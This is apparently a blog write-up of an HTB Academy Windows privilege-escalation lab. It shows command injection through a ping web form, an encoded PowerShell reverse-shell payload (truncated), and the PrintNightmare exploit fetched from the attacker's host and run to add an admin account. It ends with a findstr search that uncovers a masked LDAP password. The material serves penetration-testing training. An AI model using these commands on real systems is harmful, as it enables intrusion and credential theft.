Windows PrivEsc

1. ---
2. title: HTB Academy | Windows Privilege Escalation Skills Assessment I
3. date: 2023-08-01 18:55:00 -0500
4. categories: [Writeups, HTB]
5. tags: [pentest, htb, attack, windows, privilege]
6. ---
7.  
8. ## Challenge
9.  
10. During a penetration test against the INLANEFREIGHT organization, you encounter a non-domain joined Windows server host that suffers from an unpatched command injection vulnerability. After gaining a foothold, you come across credentials that may be useful for lateral movement later in the assessment and uncover another flaw that can be leveraged to escalate privileges on the target host.
11.  
12. For this assessment, assume that your client has a relatively mature patch/vulnerability management program but is understaffed and unaware of many of the best practices around configuration management, which could leave a host open to privilege escalation.
13.  
14. Enumerate the host (starting with an Nmap port scan to identify accessible ports/services), leverage the command injection flaw to gain reverse shell access, escalate privileges to NT AUTHORITY\SYSTEM level or similar access, and answer the questions below to complete this portion of the assessment.
15.  
16. - Which two KBs are installed on the target system? (Answer format: 3210000&3210060)
17. - Find the password for the ldapadmin account somewhere on the system.
18. - Escalate privileges and submit the contents of the flag.txt file on the Administrator Desktop.
19. - After escalating privileges, locate a file named confidential.txt. Submit the contents of this file.
20.  
21. ## Our Host
22. `10.10.14.30`
23.  
24. ## Target
25. `10.129.143.15`
26.  
27. ## Enumeration
28.  
29. Performed NMAP scan on the target.
30. ```bash
31. $ sudo nmap 10.129.143.15 -Pnp -A
32. Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-01 17:12 BST
33. Nmap scan report for 10.129.143.15
34. Host is up (0.0071s latency).
35. Not shown: 998 filtered tcp ports (no-response)
36. PORT STATE SERVICE VERSION
37. 80/tcp open http Microsoft IIS httpd 10.0
38. | http-methods:
39. |_ Potentially risky methods: TRACE
40. |_http-server-header: Microsoft-IIS/10.0
41. |_http-title: DEV Connection Tester
42. 3389/tcp open ms-wbt-server Microsoft Terminal Services
43. | ssl-cert: Subject: commonName=WINLPE-SKILLS1-SRV
44. | Not valid before: 2023-07-31T15:26:14
45. |_Not valid after: 2024-01-30T15:26:14
46. |_ssl-date: 2023-08-01T16:12:56+00:00; 0s from scanner time.
47. | rdp-ntlm-info:
48. | Target_Name: WINLPE-SKILLS1-
49. | NetBIOS_Domain_Name: WINLPE-SKILLS1-
50. | NetBIOS_Computer_Name: WINLPE-SKILLS1-
51. | DNS_Domain_Name: WINLPE-SKILLS1-SRV
52. | DNS_Computer_Name: WINLPE-SKILLS1-SRV
53. | Product_Version: 10.0.14393
54. |_ System_Time: 2023-08-01T16:12:51+00:00
55. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
56. Device type: general purpose
57. Running (JUST GUESSING): Microsoft Windows 2016 (89%)
58. OS CPE: cpe:/o:microsoft:windows_server_2016
59. Aggressive OS guesses: Microsoft Windows Server 2016 (89%)
60. No exact OS matches for host (test conditions non-ideal).
61. Network Distance: 2 hops
62. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
63.  
64. TRACEROUTE (using port 3389/tcp)
65. HOP RTT ADDRESS
66. 1 12.58 ms 10.10.14.1
67. 2 11.91 ms 10.129.143.15
68.  
69. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
70. Nmap done: 1 IP address (1 host up) scanned in 20.48 seconds
71. ```
72. RDP protocol was opened. However, we did not have initial credentials. Browsed to HTTP web page, we saw a ping utility with a text entry field and a submit button. We could try to input our injection command:
73. ```bash
74. ping 127.0.0.1|whoami
75. ```
76. We got the output showing `iis apppool\defaultapppool`. This confirmed the page was vulnerable to command injection.
77. Then we could inject our shellcode.
78. ```bash
79. 127.0.0.1|powershell -e JABjAGwAaQBlAG4AdAAgA..<SNIP>...
80. ```
81. Now we gained a restricted reverse shell. We could run `systeminfo` to gain the details of the OS.
82. ```powershell
83. PS C:\windows\system32\inetsrv> systeminfo
84.  
85. Host Name: WINLPE-SKILLS1-
86. OS Name: Microsoft Windows Server 2016 Standard
87. OS Version: 10.0.14393 N/A Build 14393
88. OS Manufacturer: Microsoft Corporation
89. OS Configuration: Standalone Server
90. OS Build Type: Multiprocessor Free
91. Registered Owner: Windows User
92. Registered Organization:
93. Product ID: 00376-30821-30176-AA757
94. Original Install Date: 5/25/2021, 8:57:43 PM
95. System Boot Time: 8/1/2023, 8:26:00 AM
96. System Manufacturer: VMware, Inc.
97. System Model: VMware7,1
98. System Type: x64-based PC
99. Processor(s): 2 Processor(s) Installed.
100. [01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
101. [02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
102. BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
103. Windows Directory: C:\Windows
104. System Directory: C:\Windows\system32
105. Boot Device: \Device\HarddiskVolume2
106. System Locale: en-us;English (United States)
107. Input Locale: en-us;English (United States)
108. Time Zone: (UTC-08:00) Pacific Time (US & Canada)
109. Total Physical Memory: 4,095 MB
110. Available Physical Memory: 3,179 MB
111. Virtual Memory: Max Size: 4,799 MB
112. Virtual Memory: Available: 3,899 MB
113. Virtual Memory: In Use: 900 MB
114. Page File Location(s): C:\pagefile.sys
115. Domain: WORKGROUP
116. Logon Server: N/A
117. Hotfix(s): 2 Hotfix(s) Installed.
118. [01]: KB3199986
119. [02]: KB3200970
120. Network Card(s): 1 NIC(s) Installed.
121. [01]: vmxnet3 Ethernet Adapter
122. Connection Name: Ethernet0
123. DHCP Enabled: Yes
124. DHCP Server: 10.129.0.1
125. IP address(es)
126. [01]: 10.129.143.15
127. [02]: fe80::5da6:b6ab:3cd4:84fb
128. [03]: dead:beef::5da6:b6ab:3cd4:84fb
129. [04]: dead:beef::85
130. Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
131. ```
132. We knew that the OS version was 10.0.14393, and patched with KB3199986 and KB3200970.
133.  
134. ## Privilege Escalation
135.  
136. There were several exploits we could use. Here we use [CVE-2021-1675 - PrintNightmare LPE (PowerShell)](https://github.com/calebstewart/CVE-2021-1675). Downloaded the `ps1` script on the target.
137. ```powershell
138. PS C:\users\public\download> wget -Uri http://10.10.14.30:8000/CVE-2021-1675.ps1 -UseBasicParsing -outfile CVE-2021-1675.ps1
139. ```
140. We could the script to create new account `adm1n`/`P@ssw0rd` in the local admin group.
141. ```powershell
142. PS C:\users\public\download> Import-Module .\cve-2021-1675.ps1
143. PS C:\users\public\download> Invoke-Nightmare # add user `adm1n`/`P@ssw0rd`
144. ```
145.  
146. ## Search Credentials
147. Performed RDP with this new admin account. We then could start search for the credentials.
148. Searched for `ldapadmin` string on the text file.
149. ```cmd
150. c:\Users>findstr /SIM /C:"ldapadmin" *.txt *.ini *.cfg *.config *.xml
151. Administrator\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml
152. Administrator\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.ui\dialog_settings.xml
153. htb-student\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml
154. htb-student\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.core\connections.xml-temp
155. htb-student\.ApacheDirectoryStudio\.metadata\.plugins\org.apache.directory.studio.connection.ui\dialog_settings.xml
156. ```
157. Opened the first `connections.xml`, we got the password for the `ldapadmin` account.
158. ```xml
159. <?xml version="1.0" encoding="UTF-8"?>
160.  
161. <connections>
162. <connection id="21f81b55-9e67-4f2a-b9e7-1939d662f017" name="LDAP.inlanefreight.local" host="dc01.inlanefreight.local" port="389" encryptionMethod="NONE" authMethod="SIMPLE" bindPrincipal="ldapadmin" bindPassword="XX...X" saslRealm="" saslQop="AUTH" saslSecStrenght="HIGH" saslMutualAuth="false" krb5CredentialsConf="USE_NATIVE" krb5Config="DEFAULT" krb5ConfigFile="" krb5Realm="" krb5KdcHost="" krb5KdcPort="88" readOnly="false" timeout="30000">
163. ...<SNIP>...
164. ```
165. Then searched for `confidential.txt`:
166. ```cmd
167. c:\Users>dir /s confidential.txt
168. Volume in drive C has no label.
169. Volume Serial Number is 7029-F417
170.  
171. Directory of c:\Users\Administrator\Music
172.  
173. 06/07/2021 12:41 PM 32 confidential.txt
174. 1 File(s) 32 bytes
175.  
176. Total Files Listed:
177. 1 File(s) 32 bytes
178. 0 Dir(s) 18,834,948,096 bytes free
179. ```
180.  
181. ## References
182.  
183. https://academy.hackthebox.com/module/67/section/637
184.  
185. https://github.com/calebstewart/CVE-2021-1675